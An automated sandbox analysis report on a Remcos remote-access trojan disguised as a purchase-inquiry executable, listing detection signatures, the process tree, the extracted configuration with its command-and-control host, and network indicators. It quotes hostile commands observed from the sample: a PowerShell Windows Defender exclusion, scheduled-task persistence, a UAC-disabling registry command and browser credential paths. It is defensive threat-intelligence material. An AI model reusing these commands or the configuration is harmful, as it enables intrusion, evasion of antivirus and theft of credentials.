Windows Analysis Report
Purchase Inquiry_002.exe

Overview

General Information

Sample name: Purchase Inquiry_002.exe
Analysis ID: 1560114
MD5: c016b06a4942455df9ce8a58b72bcc90
SHA1: dba52afe33451c444fd5cf3c6aca9d2ced768d2c
SHA256: e115d3bd2903d9d663a7a69edd08b0ba5f2528c831d17530bbf621648b44894c
Tags: exe, user-TeamDreier

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase Inquiry_002.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1708 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5956 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Purchase Inquiry_002.exe (PID: 8184 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
  • xASiLfzXONGIW.exe (PID: 1412 cmdline: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe MD5: C016B06A4942455DF9CE8A58B72BCC90)
    • schtasks.exe (PID: 6116 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xASiLfzXONGIW.exe (PID: 6124 cmdline: "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["cee.work.gd:2531:1"], "Assigned name": "ce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-1IH5DX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
Source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
        • 0x691e0:$a1: Remcos restarted by watchdog!
        • 0x69738:$a3: %02i:%02i:%02i:%03i
        • 0x69abd:$a4: * Remcos v
Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
        • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6320c:$str_b2: Executing file:
        • 0x64328:$str_b3: GetDirectListeningPort
        • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x63e30:$str_b7: \update.vbs
        • 0x63234:$str_b9: Downloaded file:
        • 0x63220:$str_b10: Downloading file:
        • 0x632c4:$str_b12: Failed to upload file:
        • 0x642f0:$str_b13: StartForward
        • 0x64310:$str_b14: StopForward
        • 0x63dd8:$str_b15: fso.DeleteFile "
        • 0x63d6c:$str_b16: On Error Resume Next
        • 0x63e08:$str_b17: fso.DeleteFolder "
        • 0x632b4:$str_b18: Uploaded file:
        • 0x63274:$str_b19: Unable to delete:
        • 0x63da0:$str_b20: while fso.FileExists("
        • 0x63749:$str_c0: [Firefox StoredLogins not found]
Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Author: ditekSHen, Strings:
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe, ParentImage: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe, ParentProcessId: 1412, ParentProcessName: xASiLfzXONGIW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", ProcessId: 6116, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", ProcessId: 5956, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", ProcessId: 5956, ProcessName: schtasks.exe
Timestamp: 2024-11-21T12:22:03.765320+0100, SID: 2036594, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.10, Source Port: 49749, Destination IP: 154.216.19.141, Destination Port: 2531, Protocol: TCP
Timestamp: 2024-11-21T12:22:07.045321+0100, SID: 2803304, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.10, Source Port: 49757, Destination IP: 178.237.33.50, Destination Port: 80, Protocol: TCP


            AV Detection

            Source: cee.work.gdAvira URL Cloud: Label: malware
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["cee.work.gd:2531:1"], "Assigned name": "ce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-1IH5DX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeReversingLabs: Detection: 73%
            Source: Purchase Inquiry_002.exeReversingLabs: Detection: 73%
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeJoe Sandbox ML: detected
            Source: Purchase Inquiry_002.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004315EC
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c06cbc74-2
            Source: Purchase Inquiry_002.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Purchase Inquiry_002.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: zJGj.pdb source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: Binary string: zJGj.pdbSHA2567 source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040838E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004087A0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00407848
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004068CD FindFirstFileW,FindNextFileW,14_2_004068CD
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0044BA59 FindFirstFileExA,14_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00406D28
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 4x nop then jmp 06D95078h0_2_06D94801
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 4x nop then jmp 074242E0h10_2_07423A69

            Networking

            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49749 -> 154.216.19.141:2531
            Source: Malware configuration extractorURLs: cee.work.gd
            Source: global trafficTCP traffic: 192.168.2.10:49749 -> 154.216.19.141:2531
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49757 -> 178.237.33.50:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041936B
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: cee.work.gd
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, xASiLfzXONGIW.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1341190098.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1380724904.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.drString found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000014_2_00409340
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Purchase Inquiry_002.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00414EC1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,14_2_00409468

            E-Banking Fraud

            Source: Yara match | File source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
